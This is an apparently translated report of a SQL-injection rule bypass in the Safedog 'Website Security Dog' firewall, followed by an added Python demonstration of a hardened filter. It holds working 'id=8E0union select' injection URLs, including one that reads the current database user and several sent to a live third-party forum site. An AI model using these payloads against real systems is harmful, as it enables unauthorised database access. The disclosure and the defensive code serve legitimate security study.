Protection rule bypass in the latest version of Website Security Dog
Tested against both the Apache and IIS versions of Website Security Dog.
1. Downloaded the latest version of Website Security Dog (Apache), V3.1.09924, from the official Safedog website. And the webhorse repository version is:
Testing shows that a protection rule is bypassed.
2. The IIS version was tested against http://bbs.siteserver.cn/
Testing found that the latest version of Website Security Dog has this protection rule bypassed.
1. Latest Apache version of Website Security Dog, V3.1.09924.
1. First, test with union select 1,2,3,4,5 and so on.
2. If the id value is changed to 8E0, the rule is bypassed:
http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
3. View the current user:
http://192.168.142.128/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,44#
2. IIS test against http://bbs.siteserver.cn/
1. http://bbs.siteserver.cn//siteserver/platform/background_dbSqlQuery.aspx?id=1%20and%201=1
2. If the id value is changed to 8E0, the rule is bypassed:
http://bbs.siteserver.cn//siteserver/platform/background_dbSqlQuery.aspx?id=8E0union%20select%201,2,3,4,5
Solution:
Fix the handling of id=8E0.
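The following is an added example, not Safedog's code and not part of the original report. It shows why a keyword rule anchored on word boundaries misses 8E0union, and a check that ends numeric literals (including scientific notation) before matching. The rule NAIVE_RULE and all function names are assumptions made for illustration; the real Safedog rule is not given on the page.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical keyword rule of the kind this bypass defeats (assumption:
# the product's actual rule is not shown in the report).
NAIVE_RULE = re.compile(r"\bunion\s+select\b", re.I)

# A numeric literal as a SQL lexer reads it: 8, 8.5, 8E0, 1.5e-3.
# The lookbehind keeps identifiers such as abc8e0 from being split.
NUMBER = re.compile(r"(?<![A-Za-z0-9_])\d+(?:\.\d*)?(?:[eE][+-]?\d+)?")


def naive_match(value: str) -> bool:
    """Decode the parameter and apply the keyword rule directly."""
    return bool(NAIVE_RULE.search(unquote_plus(value)))


def split_numeric_literals(text: str) -> str:
    """Put a space after each numeric literal, where the lexer ends the token."""
    return NUMBER.sub(lambda m: m.group(0) + " ", text)


def hardened_match(value: str) -> bool:
    """Apply the same rule after numeric literals have been separated."""
    return bool(NAIVE_RULE.search(split_numeric_literals(unquote_plus(value))))


def is_plain_integer(value: str) -> bool:
    """Application-side check: accept id only as an unsigned integer."""
    return re.fullmatch(r"\d{1,10}", value) is not None


if __name__ == "__main__":
    # Parameter values: the first two follow the report, the rest are constructed.
    samples = [
        "1%20union%20select%201,2,3,4,5",
        "8E0union%20select%201,2,3,4,5",
        "8E0",
        "42",
    ]
    for s in samples:
        print(f"{s!r:40} naive={naive_match(s)!s:5} "
              f"hardened={hardened_match(s)!s:5} integer={is_plain_integer(s)}")
```

The naive rule fails because there is no word boundary between the 0 of 8E0 and the u of union, so the keyword is never seen as a separate word; rejecting any id that is not a plain integer in the application removes the dependence on the filter altogether.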